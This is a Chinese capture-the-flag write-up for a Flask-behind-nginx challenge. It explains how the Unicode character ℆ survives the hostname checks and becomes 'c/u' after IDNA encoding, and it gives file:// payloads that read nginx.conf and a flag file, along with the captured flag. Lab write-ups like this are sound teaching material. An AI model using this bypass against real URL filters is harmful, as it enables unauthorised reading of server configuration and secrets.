题目提示了,是ngix,所以我们要知道nginx一些文件存放的地方
配置文件存放目录:/etc/nginx
主配置文件:/etc/nginx/conf/nginx.conf
管理脚本:/usr/lib64/systemd/system/nginx.service
模块:/usr/lisb64/nginx/modules
应用程序:/usr/sbin/nginx
程序默认存放位置:/usr/share/nginx/html
日志默认存放位置:/var/log/nginx
配置文件目录为:/usr/local/nginx/conf/nginx.conf
题目源码如下
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Document</title>
</head>
<body>
<form method="GET" action="getUrl">
URL:<input type="text" name="url"/>
<input type="submit" value="Submit"/>
</form>
<code>
@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
url = request.args.get("url")
host = parse.urlparse(url).hostname
if host == 'suctf.cc':
return "我扌 your problem? 111"
parts = list(urlsplit(url))
host = parts[1]
if host == 'suctf.cc':
return "我扌 your problem? 222 " + host
newhost = []
for h in host.split('.'):
newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.join(newhost)
#去掉 url 中的空格
finalUrl = urlunsplit(parts).split(' ')[0]
host = parse.urlparse(finalUrl).hostname
if host == 'suctf.cc':
return urllib.request.urlopen(finalUrl).read()
else:
return "我扌 your problem? 333"
</code>
<!-- Dont worry about the suctf.cc. Go on! -->
<!-- Do you know the nginx? -->
</body>
</html>
代码审计,不是很难,前两个要求我们判断 host 是否是 suctf.cc ,如果不是才能继续。第三个if要求我们当经过了 decode(‘utf-8’) 之后传进了 urlunsplit 函数后,第三个if读入的要是suctf.cc。
所以我们构造一个payload
在nginx中,字符℆ 在后台转码会解析为c/u,我们可以用℆进行绕过
file://suctf.c℆sr/local/nginx/conf/nginx.conf
我们发现里面存在着一个/flag文件在/user/fffffflag中
构造payload进行读取
file://suctf.c℆sr/fffffflag
flag:
flag{ce8672af-ac55-46eb-971c-01952589cbba}
593
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
